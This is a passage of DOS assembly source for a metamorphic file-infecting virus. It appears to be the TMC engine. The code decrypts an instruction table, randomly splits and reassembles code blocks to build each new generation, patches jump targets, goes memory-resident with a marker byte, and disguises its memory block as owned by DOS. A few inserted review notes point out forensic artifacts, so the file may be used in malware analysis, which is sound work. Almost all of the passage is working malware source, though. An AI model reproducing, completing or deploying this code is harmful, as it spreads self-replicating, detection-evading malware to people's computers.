al,11101000b ; CALL; JMP; Data reference; Jcc? jae exam_data ; Above or equal? Jump to exam_data nop nop nop cmp al,10h ; Data? jbe sto_instruct ; Below or equal? Jump to sto_inst... nop nop nop sub al,10h ; AL = length of data jmp sto_instruct sto_instruct: xor cx,cx ; Zero CX mov cl,al ; CL = length of instruction push di ; Save DI at stack mov di,bx ; DI = offset within next virus ge... jmp sto_ins_loop sto_ins_loop: call decrypt_byte stosb ; Store byte of instruction dec cx ; Decrease counter jnz sto_ins_loop ; Not zero? 
Jump to sto_ins_loop nop nop nop mov bx,di ; BX = offset within next virus ge... pop di ; Load DI from stack jmp exam_bloc_ exam_data: cmp al,11101101b ; Data reference? jne exam_blo_ ; Not equal? Jump to exam_blo_ nop nop nop push di ; Save DI at stack mov di,es:[08h] ; DI = offset within data information mov ax,bx ; AX = offset within next virus ge... dec ax ; Decrease offset within next viru... dec ax ; Decrease offset within next viru... stosw ; Store offset within next virus g... call decrypt_id stosw ; Store block identification mov es:[08h],di ; Store offset within data informa... pop di ; Load DI from stack jmp exam_bloc_ exam_blo_: cmp al,11101110b ; Beginning of block? jne sto_call_jmp ; Not equal? Jump to sto_call_jmp nop nop nop push di ; Save DI at stack mov di,es:[04h] ; DI = offset within block informa... mov ax,bx ; AX = offset within next virus ge... stosw ; Store offset within next virus ge... call decrypt_id stosw ; Store block identification mov es:[04h],di ; Store offset within block inform... cmp ax,4c5h ; Block identification of tmc_table? jne exam_message ; Not equal? Jump to exam_message nop nop nop push si ; Save SI at stack mov di,bx ; DI = offset within next virus ge... lea si,[bp+tmc_table] ; SI = offset of tmc_table mov cx,(table_end-table_begin) rep movsb ; Move table to top of memory mov bx,di ; BX = offset within next virus ge... pop si ; Load SI from stack jmp examine_next exam_message: cmp ax,2328h ; Block identification of message? jne exam_probabi ; Not equal? Jump to exam_probabi nop nop nop mov ax,14h ; Probability of including message cmp [bp+probability],ax ; Include message? jae examine_next ; Above or equal? Jump to examine_... nop nop nop call decrypt_byte sub al,10h ; AL = length of message mov ah,00h ; Zero AH add si,ax ; SI = offset of end of message jmp examine_next exam_probabi: cmp ax,0bech ; Block identification of probabi...? jne examine_next ; Not equal? 
Jump to examine_next nop nop nop mov ax,[bp+probability] ; AX = probability dec ax ; Decrease probability cmp ax,05h ; Probability too small? jae store_probab ; Above or equal? Jump to store_pr... nop nop nop mov ax,64h ; Reset probability jmp store_probab store_probab: mov es:[bx],ax ; Store probability add bx,02h ; Add two to offset within next vi... add si,03h ; SI = offset of beginning of next... jmp examine_next examine_next: pop di ; Load DI from stack call decrypt_byte jmp exam_bloc___ sto_call_jmp: push ax di ; Save registers at stack mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... mov ax,bx ; AX = offset within next virus ge... stosw ; Store offset within next virus g... call decrypt_id stosw ; Store block identification mov es:[06h],di ; Store offset within CALL; JMP; J... pop di ax ; Load registers from stack mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... add bx,03h ; Add three to offset within next ... cmp al,11110000b ; Jump condition? jae jcc_imm8 ; Above or equal? Jump to jcc_imm8 jmp exam_bloc_ jcc_imm8: inc bx ; Increase offset within next viru... inc bx ; Increase offset within next viru... jmp exam_bloc_ split_block_: mov es:[di+02h],bx ; Store offset within next virus g... add bx,03h ; Add three to offset within next ... jmp end_of_block end_of_block: dec si ; Decrease offset of block within ... mov es:[di],si ; Store offset of block within table jmp split_block exam_tbl_inf: cmp word ptr es:[0ch],00h jne correct_i16 ; End of second table? Jump to cor... nop nop nop pop si ; Load SI from stack mov es:[0ch],bx ; Store offset within next virus g... add si,(second_table-first_table) jmp initial_tmc correct_i16: push es ; Save ES at stack pop ds ; Load DS from stack (ES) sub bx,4000h ; Subtract offset of next virus ge... mov ds:[0eh],bx ; Store length of virus mov si,2000h ; SI = offset of CALL; JMP; Jcc im... mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... sub cx,si ; Subtract offset of CALL; JMP; Jc... 
shr cx,01h ; Divide number of CALL imm16; JMP... shr cx,01h ; Divide number of CALL imm16; JMP... jmp jmp_call_loo jmp_call_loo: lodsw ; AX = offset of block within data... push ax ; Save AX at stack lodsw ; AX = offset of block within data... push cx si ; Save registers at stack mov si,1000h ; SI = offset of block information mov cx,ds:[04h] ; CX = offset of end of block info... sub cx,si ; Subtract offset of block informa... shr cx,01h ; Divide number of block by two shr cx,01h ; Divide number of block by two jmp find_block find_block: cmp ax,[si+02h] ; Found block? je found_block ; Equal? Jump to found_block nop nop nop add si,04h ; SI = offset of next block in table dec cx ; Decrease counter jnz find_block ; Not zero? Jump to find_block nop nop nop found_block: mov dx,[si] ; DX = offset of block pop si cx ; Load registers from stack pop bx ; Load BX from stack (AX) mov al,[bx] ; AL = first byte of instruction cmp al,11110000b ; Jump condition? jb sto_call_jm ; Below? Jump to sto_call_jm nop nop nop sub byte ptr [bx],10000000b inc bx ; BX = offset of 8-bit immediate push dx ; Save DX at stack sub dx,bx ; Subtract offset within next viru... dec dx ; Decrease 8-bit immediate cmp dx,7fh ; 8-bit immediate out of range? jg invert_jcc ; Greater? Jump to invert_jcc nop nop nop cmp dx,0ff80h ; 8-bit immediate out of range? jl invert_jcc ; Less? Jump to invert_jcc nop nop nop mov [bx],dl ; Store 8-bit immediate inc bx ; BX = offset of end of Jcc imm8 mov [bx],1001000010010000b mov byte ptr [bx+02h],10010000b pop dx ; Load DX from stack jmp correct_i16_ invert_jcc: pop dx ; Load DX from stack dec bx ; BX = offset of Jcc imm8 xor byte ptr [bx],00000001b inc bx ; BX = offset of 8-bit immediate mov byte ptr [bx],03h ; Store 8-bit immediate inc bx ; BX = offset of JMP imm16 mov al,11101001b ; JMP imm16 (opcode 0e9h) jmp sto_call_jm sto_call_jm: mov [bx],al ; Store CALL imm16; JMP imm16 inc bx ; BX = offset of 16-bit immediate sub dx,bx ; Subtract offset within next viru... 
dec dx ; Decrease 16-bit immediate dec dx ; Decrease 16-bit immediate mov [bx],dx ; Store 16-bit immediate jmp correct_i16_ correct_i16_: dec cx ; Decrease counter jnz jmp_call_loo ; Not zero? Jump to jmp_call_loo nop nop nop mov si,3000h ; SI = offset of data information mov cx,ds:[08h] ; CX = offset of end of data infor... sub cx,si ; Subtract offset of data informat... shr cx,01h ; Divide number of data references... shr cx,01h ; Divide number of data references... jmp data_ref_loo data_ref_loo: lodsw ; AX = offset of block within data... push ax ; Save AX at stack lodsw ; AX = offset of block within data... push cx si ; Save registers at stack mov si,1000h ; SI = offset of block information mov cx,ds:[04h] ; CX = offset of end of block info... sub cx,si ; Subtract offset of block informa... shr cx,01h ; Divide number of block by two shr cx,01h ; Divide number of block by two jmp find_block_ find_block_: cmp ax,[si+02h] ; Found block? je found_block_ ; Equal? Jump to found_block_ nop nop nop add si,04h ; SI = offset of next block in table dec cx ; Decrease counter jnz find_block_ ; Not zero? Jump to find_block_ nop nop nop found_block_: mov ax,[si] ; AX = offset of block pop si cx ; Load registers from stack pop bx ; Load BX from stack (AX) sub ax,4000h ; Subtract offset of next virus ge... mov [bx],ax ; Store 16-bit immediate dec cx ; Decrease counter jnz data_ref_loo ; Not zero? Jump to data_ref_loo nop nop nop jmp restore_code restore_code: mov ax,[bp+program_seg] ; AX = segment of PSP for current ... mov cx,[bp+initial_ss] ; CX = initial SS relative to star... add cx,10h ; Add ten to initial SS relative t... add cx,ax ; Add segment of PSP for current p... push cx ; Save CX at stack push [bp+initial_sp] ; Save initial SP at stack mov cx,[bp+initial_cs] ; CX = initial CS relative to star... add cx,10h ; Add ten to initial CS relative t... add cx,ax ; Add segment of PSP for current p... 
push cx ; Save CX at stack push [bp+initial_ip] ; Save initial IP at stack push ax ; Save segment of PSP for current ... push [bp+mcb_size] ; Save size of memory block in par... push ds ; Save DS at stack mov cl,00h ; COM executable cmp [bp+executa_stat],cl jne move_virus ; COM executable? Jump to move_virus nop nop nop lea si,[bp+origin_code] ; SI = offset of origin_code mov ax,cs:[si] ; AX = first two bytes of original... mov cs:[100h],ax ; Store first two bytes of origina... mov al,cs:[si+02h] ; AL = last byte of original code ... mov cs:[100h+02h],al ; Store last byte of original code... jmp move_virus mov ax,[bp+program_seg] ; AX = segment of PSP for current ... mov cx,[bp+initial_ss] ; CX = initial SS relative to star... add cx,10h ; Add ten to initial SS relative t... add cx,ax ; Add segment of PSP for current p... push cx ; Save CX at stack push [bp+initial_sp] ; Save initial SP at stack mov cx,[bp+initial_cs] ; CX = initial CS relative to star... add cx,10h ; Add ten to initial CS relative t... add cx,ax ; Add segment of PSP for current p... push cx ; Save CX at stack push [bp+incorrect_ip] ; Save incorrect IP at stack push ax ; Save segment of PSP for current ... push [bp+mcb_size] ; Save size of memory block in par... push ds ; Save DS at stack mov cl,00h ; COM executable cmp [bp+executa_stat],cl jne move_virus ; COM executable? Jump to move_virus nop nop nop lea si,[bp+origin_code] ; SI = offset of origin_code mov ax,cs:[si] ; AX = first two bytes of original... mov cs:[100h],ax ; Store first two bytes of origina... mov al,cs:[si+02h] ; AL = last byte of original code ... mov cs:[100h+02h],al ; Store last byte of original code... jmp move_virus move_virus: xor ax,ax ; Zero AX mov ds,ax ; DS = segment of DOS communicatio... cmp byte ptr ds:[501h],10h jne move_virus_ ; Already resident? Jump to move_v... 
; Review note: this stretch marks the virus resident (byte at 0000:0501h = 10h), copies the generated code into a newly allocated block and writes 08h to the owner field of that block's Memory Control Block; both values are memory artifacts an analyst can check for.
jmp virus_exit move_virus_: mov byte ptr ds:[501h],10h ; Set resident marker (DS = 0000h here) push es ; Save ES at stack pop ds ; Load DS from stack (ES) mov ax,ds:[0ch] ; AX = offset within next virus ge... sub ax,4000h ; Subtract offset of next virus ge... mov [bp+vir_exit_off],ax mov cx,ds:[0eh] ; CX = length of virus mov [bp+virus_length],cx mov si,4000h ; SI = offset of next virus genera... xor di,di ; Zero DI rep movsb ; Move next virus generation to offset 00h of ES mov cl,04h ; Divide by paragraphs shr di,cl ; DI = length of next virus genera... inc di ; Increase length of next virus ge... mov bx,[bp+mcb_size_] ; BX = size of memory block in par... sub bx,[bp+new_mcb_size] sub bx,di ; Subtract length of next virus ge... dec bx ; Decrease new size in paragraphs dec bx ; Decrease new size in paragraphs cmp bx,di ; Insufficient memory? jae resize_mem_ ; Above or equal? Jump to resize_mem_ jmp virus_exit resize_mem_: mov ah,4ah ; Resize memory block int 21h jnc allocat_mem_ ; No error? Jump to allocat_mem_ jmp virus_exit allocat_mem_: mov bx,di ; BX = number of paragraphs to all... mov ah,48h ; Allocate memory int 21h jc virus_exit ; Error? Jump to virus_exit nop nop nop push ax ; Save AX at stack dec ax ; AX = segment of current Memory C... mov es,ax ; ES = segment of current Memory C... mov word ptr es:[01h],08h ; Set owner field of Memory Control Block to 08h pop es ; Load ES from stack (AX) mov cx,[bp+virus_length] xor si,si ; Zero SI xor di,di ; Zero DI rep movsb ; Move virus to top of memory push es ; Save ES at stack push word ptr [bp+vir_exit_off] mov al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... mov ah,byte ptr [bp+sliding_key] ; AH = low-order byte of sliding key retf ; Return far terminate: mov ax,4c00h ; Terminate with return code int 21h get_rnd_num proc near ; Get 16-bit random number push cx ; Save CX at stack in al,40h ; AL = 8-bit value read from port 40h (timer) mov ah,al ; AH = 8-bit random number in al,40h ; AL = 8-bit value read from port 40h (timer) xor ax,es:[01h] ; AX = 16-bit random number mov cl,ah ; CL = high-order byte of 16-bit r...
; Review note: decrypt_byte XORs the table byte at [SI] with the low byte of ((SI - BP - offset tmc_table) * sliding_key + crypt_key), so the key changes with the position in the table; MUL overwrites DX and the routine does not save it.
rol ax,cl ; AX = 16-bit random number mov es:[01h],ax ; Store 16-bit random number pop cx ; Load CX from stack ret ; Return endp rnd_in_range proc near ; Random number within range or bp,bp ; Zero BP? jz zero_range ; Zero? Jump to zero_range nop nop nop push dx ; Save DX at stack call get_rnd_num xor dx,dx ; Zero DX div bp ; DX = random number within range xchg ax,dx ; AX = random number within range pop dx ; Load DX from stack ret ; Return zero_range: xor ax,ax ; AX = random number within range ret ; Return endp decrypt_byte proc near ; Decrypt byte of table mov [bp+ah_],ah ; Store AH mov ax,si ; AX = offset within table sub ax,bp ; Subtract delta offset from offse... sub ax,offset tmc_table ; Subtract offset of tmc_table fro... mul word ptr [bp+sliding_key] ; DX:AX = offset within table * sliding key (DX is overwritten) add al,[bp+crypt_key] ; Add 8-bit encryption/decryption key xor al,[si] ; AL = byte of decrypted table mov ah,[bp+ah_] ; AH = stored AH inc si ; Increase offset within table ret ; Return endp decrypt_id proc near ; Decrypt block identification in ... call decrypt_byte mov ah,al ; AH = first byte of decrypted block identification call decrypt_byte xchg al,ah ; AX = decrypted block identification ret ; Return endp virus_exit: pop es ; Load ES from stack mov ah,49h ; Free memory int 21h pop bx ; Load BX from stack pop ax ; Load AX from stack mov ds,ax ; DS = segment of PSP for current ... mov es,ax ; ES = segment of PSP for current ... mov ah,4ah ; Resize memory block int 21h lea bx,[bp+jmp_imm32] ; BX = offset of jmp_imm32 pop ax ; Load AX from stack (initial IP) mov cs:[bx+01h],ax ; Store initial IP pop ax ; Load AX from stack (initial CS ...) mov cs:[bx+03h],ax ; Store initial CS relative to sta... pop ax ; Load AX from stack (initial SP) pop ss ; Load SS from stack (initial SS ...) mov sp,ax ; SP = stack pointer jmp jmp_imm32 jmp_imm32 equ $ ; Offset of JMP imm32 (opcode 0eah) db 11101010b ; JMP imm32 (opcode 0eah) dd 00h ; Far pointer; virus_exit stores initial IP and CS here ah_ db 00h ; Accumulator register (high-orde...)
; Review note: data area of the first generation, followed by the start of tmc_table, whose records are a length byte followed by the instruction bytes; the 1234h operands are placeholders, each followed by a data reference record naming the block they refer to.
probability dw 32h ; Probability (range passed to rnd_in_range; a block is split when the result is zero) crypt_key db 00h ; 8-bit encryption/decryption key sliding_key dw 00h ; 16-bit sliding encryption/decryption key (declared as a word) executa_stat db 00h ; Executable status (00h = COM executable) origin_code db 11000011b,02h dup(00h) ; RET (opcode 0c3h) and two zero bytes initial_cs dw 0fff0h ; Initial CS relative to start of ... initial_ss dw 0fff0h ; Initial SS relative to start of ... initial_ip dw 100h ; Initial IP incorrect_ip dw 100h ; Incorrect IP initial_sp dw 0fffeh ; Initial SP new_mcb_size dw 1000h ; New size in paragraphs mcb_size dw 0ffffh ; Size of memory block in paragraphs mcb_size_ dw 00h ; Size of memory block in paragraphs program_seg dw 00h ; Segment of PSP for current process virus_length dw 00h ; Length of virus vir_exit_off dw 00h ; Offset of virus_exit table_begin: first_table: tmc_table db 11101111b ; End of block db 11101110b ; Beginning of block dw 00h ; Block identification of tmc_table db 03h ; Three bytes instruction mov bp,1234h ; BP = delta offset db 01h ; One byte instruction cld ; Clear direction flag db 02h ; Two bytes instruction mov ax,ds ; AX = segment of PSP for current ... db 04h ; Four bytes instruction mov [bp+1234h],ax ; Store segment of PSP for current... db 11101101b ; Data reference dw 0befh ; Pointer to program_seg_ db 01h ; One byte instruction dec ax ; AX = segment of current Memory C... db 02h ; Two bytes instruction mov ds,ax ; DS = segment of current Memory C... db 03h ; Three bytes instruction mov ax,ds:[03h] ; AX = size of memory block in par... db 03h ; Three bytes instruction cmp ax,1900h ; Insufficient memory? db 01110010b+10000000b ; Below? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 04h ; Four bytes instruction mov [bp+1234h],ax ; Store size of memory block in p...
db 11101101b ; Data reference dw 1394h ; Pointer to mcb_size___ db 04h ; Four bytes instruction mov bx,[bp+1234h] ; BX = new size in paragraphs db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 02h ; Two bytes instruction mov ah,4ah ; Resize memory block db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction mov ah,48h ; Allocate memory db 04h ; Four bytes instruction mov bx,[bp+1234h] ; BX = size of memory block in par... db 11101101b ; Data reference dw 1394h ; Pointer to mcb_size___ db 04h ; Four bytes instruction sub bx,[bp+1234h] ; Subtract new size in paragraphs ... db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 01h ; One byte instruction dec bx ; BX = number of paragraphs to all... db 04h ; Four bytes instruction cmp bx,0c00h ; Insufficient memory? db 01110010b+10000000b ; Below? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction mov es,ax ; ES = segment of allocated memory db 07h ; Seven bytes instruction mov es:[01h],0deadh ; Store 16-bit random number db 07h ; Seven bytes instruction mov word ptr es:[0ch],00h db 07h ; Seven bytes instruction mov es:[04h],1000h ; Store offset of block information db 07h ; Seven bytes instruction mov es:[06h],2000h ; Store offset of CALL; JMP; Jcc i... db 07h ; Seven bytes instruction mov es:[08h],3000h ; Store offset of data information db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of tmc_table_ db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov bx,4000h ; BX = offset of next virus genera... 
db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fa0h ; Pointer to initial_tmc db 11101111b ; End of block initial_tmc_ db 11101110b ; Beginning of block dw 0fa0h ; Block identification of initial_tmc_ db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block tmc_ini_loo db 11101110b ; Beginning of block dw 0bb8h ; Block identification of tmc_ini_... db 02h ; Two bytes instruction add si,ax ; SI = offset of block or instruct... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction or al,al ; End of table? db 01110100b+10000000b ; Zero? Jump to calc_blocks_ dw 0bbch ; Pointer to calc_blocks_ db 02h ; Two bytes instruction cmp al,11101000b ; CALL; JMP; Data reference; Jcc? db 01110011b+10000000b ; Above or equal? Jump to exam_blo__ dw 0bb9h ; Pointer to exam_blo__ db 02h ; Two bytes instruction cmp al,10h ; Data? db 01110110b+10000000b ; Below or equal? Jump to tmc_ini_... dw 0bb8h ; Pointer to tmc_ini_loo db 02h ; Two bytes instruction sub al,10h ; AL = length of data db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block exam_blo__ db 11101110b ; Beginning of block dw 0bb9h ; Block identification of exam_blo__ db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110101b+10000000b ; Not equal? Jump to exam_blo___ dw 0bbah ; Pointer to exam_blo___ db 02h ; Two bytes instruction mov al,00h ; Don't add anything to offset wit... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block exam_blo___ db 11101110b ; Beginning of block dw 0bbah ; Block identification of exam_blo___ db 02h ; Two bytes instruction cmp al,11101110b ; Beginning of block? db 01110101b+10000000b ; Not equal? 
Jump to next_byte_ dw 0bbbh ; Pointer to next_byte_ db 02h ; Two bytes instruction mov ax,si ; AX = offset of block identification db 01h ; One byte instruction dec ax ; AX = offset of block within table db 01h ; One byte instruction stosw ; Store offset of block within table db 03h ; Three bytes instruction mov ax,0ffffh ; Block is still in one part db 01h ; One byte instruction stosw ; Store block identification db 03h ; Three bytes instruction mov ax,02h ; Add two to offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block next_byte_ db 11101110b ; Beginning of block dw 0bbbh ; Block identification of next_byte_ db 02h ; Two bytes instruction mov al,02h ; Add two to offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block calc_blocks_ db 11101110b ; Beginning of block dw 0bbch ; Block identification of calc_blo... db 03h ; Three bytes instruction lea ax,[di-10h] ; AX = number of blocks multiplied... 
db 02h ; Two bytes instruction shr ax,01h ; Divide number of blocks by two db 02h ; Two bytes instruction shr ax,01h ; Divide number of blocks by two db 04h ; Four bytes instruction mov es:[0ah],ax ; Store number of blocks db 02h ; Two bytes instruction xor ax,ax ; End of table db 01h ; One byte instruction stosw ; Store end of table db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc0h ; Pointer to exam_bl db 11101111b ; End of block split_bloc db 11101110b ; Beginning of block dw 0bbdh ; Block identification of split_bloc db 01h ; One byte instruction push bp ; Save BP at stack db 05h ; Five bytes instruction mov bp,es:[0ah] ; BP = number of blocks db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 01h ; One byte instruction pop bp ; Load BP from stack db 02h ; Two bytes instruction shl ax,01h ; Multiply random number with two db 02h ; Two bytes instruction shl ax,01h ; Multiply random number with two db 03h ; Three bytes instruction add ax,10h ; Add ten to random number db 02h ; Two bytes instruction mov di,ax ; DI = random offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbeh ; Pointer to exam_nxt_bl_ db 11101111b ; End of block exam_nxt_bl_ db 11101110b ; Beginning of block dw 0bbeh ; Block identification of exam_nxt... db 03h ; Three bytes instruction add di,04h ; DI = offset of next offset withi... db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of next block within... db 02h ; Two bytes instruction or si,si ; End of table? db 01110101b+10000000b ; Not zero? 
Jump to exam_blo____ dw 0bbfh ; Pointer to exam_blo____ db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbfh ; Pointer to exam_blo____ db 11101111b ; End of block exam_blo____ db 11101110b ; Beginning of block dw 0bbfh ; Block identification of exam_blo... db 01h ; One byte instruction push ax ; Save AX at stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 01h ; One byte instruction dec si ; Decrease offset of block within ... db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01h ; One byte instruction pop ax ; Load AX from stack db 01110101b+10000000b ; Not equal? Jump to exam_bl dw 0bc0h ; Pointer to exam_bl db 02h ; Two bytes instruction cmp di,ax ; End of table of blocks? db 01110101b+10000000b ; Not equal? Jump to exam_nxt_bl_ dw 0bbeh ; Pointer to exam_nxt_bl_ db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcah ; Pointer to exam_tbl_in db 11101111b ; End of block exam_bl db 11101110b ; Beginning of block dw 0bc0h ; Block identification of exam_bl db 04h ; Four bytes instruction mov ax,es:[di+02h] ; AX = block information db 03h ; Three bytes instruction cmp ax,0ffffh ; Block is still in one part? db 01110100b+10000000b ; Equal? Jump to exam_bl_ dw 0bc1h ; Pointer to exam_bl_ db 01h ; One byte instruction push di ; Save DI at stack db 02h ; Two bytes instruction mov di,ax ; DI = offset of end of first part... db 02h ; Two bytes instruction mov al,11101001b ; JMP imm16 (opcode 0e9h) db 01h ; One byte instruction stosb ; Store JMP imm16 db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 02h ; Two bytes instruction sub ax,di ; Subtract offset of end of first ... 
db 01h ; One byte instruction stosw ; Store 16-bit immediate db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_bl_ db 11101110b ; Beginning of block dw 0bc1h ; Block identification of exam_bl_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110100b+10000000b ; Equal? Jump to end_of_bloc dw 0bc9h ; Pointer to end_of_bloc db 02h ; Two bytes instruction cmp al,10h ; Data; CALL; JMP; Data reference...? db 01110111b+10000000b ; Above? Jump to exam_bl__ dw 0bc2h ; Pointer to exam_bl__ db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push bp ; Save BP at stack db 04h ; Four bytes instruction mov bp,[bp+1234h] ; BP = probability db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 02h ; Two bytes instruction or ax,ax ; Split up block? db 01h ; One byte instruction pop bp ; Load BP from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 01110100b+10000000b ; Zero? Jump to split_bloc_ dw 0bc8h ; Pointer to split_bloc_ db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc2h ; Pointer to exam_bl__ db 11101111b ; End of block exam_bl__ db 11101110b ; Beginning of block dw 0bc2h ; Block identification of exam_bl__ db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110100b+10000000b ; Equal? Jump to end_of_bloc dw 0bc9h ; Pointer to end_of_bloc db 02h ; Two bytes instruction cmp al,11101000b ; CALL; JMP; Data reference; Jcc? db 01110011b+10000000b ; Above or equal? Jump to exam_data_ dw 0bc4h ; Pointer to exam_data_ db 02h ; Two bytes instruction cmp al,10h ; Data? db 01110110b+10000000b ; Below or equal? Jump to sto_inst... 
dw 0bc3h ; Pointer to sto_instruc db 02h ; Two bytes instruction sub al,10h ; AL = length of data db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc3h ; Pointer to sto_instruc db 11101111b ; End of block sto_instruc db 11101110b ; Beginning of block dw 0bc3h ; Block identification of sto_inst... db 02h ; Two bytes instruction xor cx,cx ; Zero CX db 02h ; Two bytes instruction mov cl,al ; CL = length of instruction db 01h ; One byte instruction push di ; Save DI at stack db 02h ; Two bytes instruction mov di,bx ; DI = offset within next virus ge... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0beah ; Pointer to sto_ins_loo db 11101111b ; End of block sto_ins_loo db 11101110b ; Beginning of block dw 0beah ; Block identification of store_op... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 01h ; One byte instruction stosb ; Store byte of instruction db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to sto_ins_loo dw 0beah ; Pointer to sto_ins_loo db 02h ; Two bytes instruction mov bx,di ; BX = offset within next virus ge... db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_data_ db 11101110b ; Beginning of block dw 0bc4h ; Block identification of exam_data_ db 02h ; Two bytes instruction cmp al,11101101b ; Data reference? db 01110101b+10000000b ; Not equal? Jump to exam_bl___ dw 0bc5h ; Pointer to exam_bl___ db 01h ; One byte instruction push di ; Save DI at stack db 05h ; Five bytes instruction mov di,es:[08h] ; DI = offset within data information db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction stosw ; Store offset within next virus g... 
db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[08h],di ; Store offset within data informa... db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_bl___ db 11101110b ; Beginning of block dw 0bc5h ; Block identification of exam_bl___ db 02h ; Two bytes instruction cmp al,11101110b ; Beginning of block? db 01110101b+10000000b ; Not equal? Jump to sto_call_jm_ dw 0bc7h ; Pointer to sto_call_jm_ db 01h ; One byte instruction push di ; Save DI at stack db 05h ; Five bytes instruction mov di,es:[04h] ; DI = offset within block informa... db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction stosw ; Store offset within next virus ge... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[04h],di ; Store offset within block inform... db 03h ; Three bytes instruction cmp ax,4c5h ; Block identification of tmc_table_? db 01110101b+10000000b ; Not equal? Jump to exam_messag dw 0bc6h ; Pointer to exam_messag db 01h ; One byte instruction push si ; Save SI at stack db 02h ; Two bytes instruction mov di,bx ; DI = offset within next virus ge... db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of tmc_table_ db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 03h ; Three bytes instruction mov cx,(code_end-first_table) db 02h ; Two bytes instruction rep movsb ; Move table to top of memory db 02h ; Two bytes instruction mov bx,di ; BX = offset within next virus ge... 
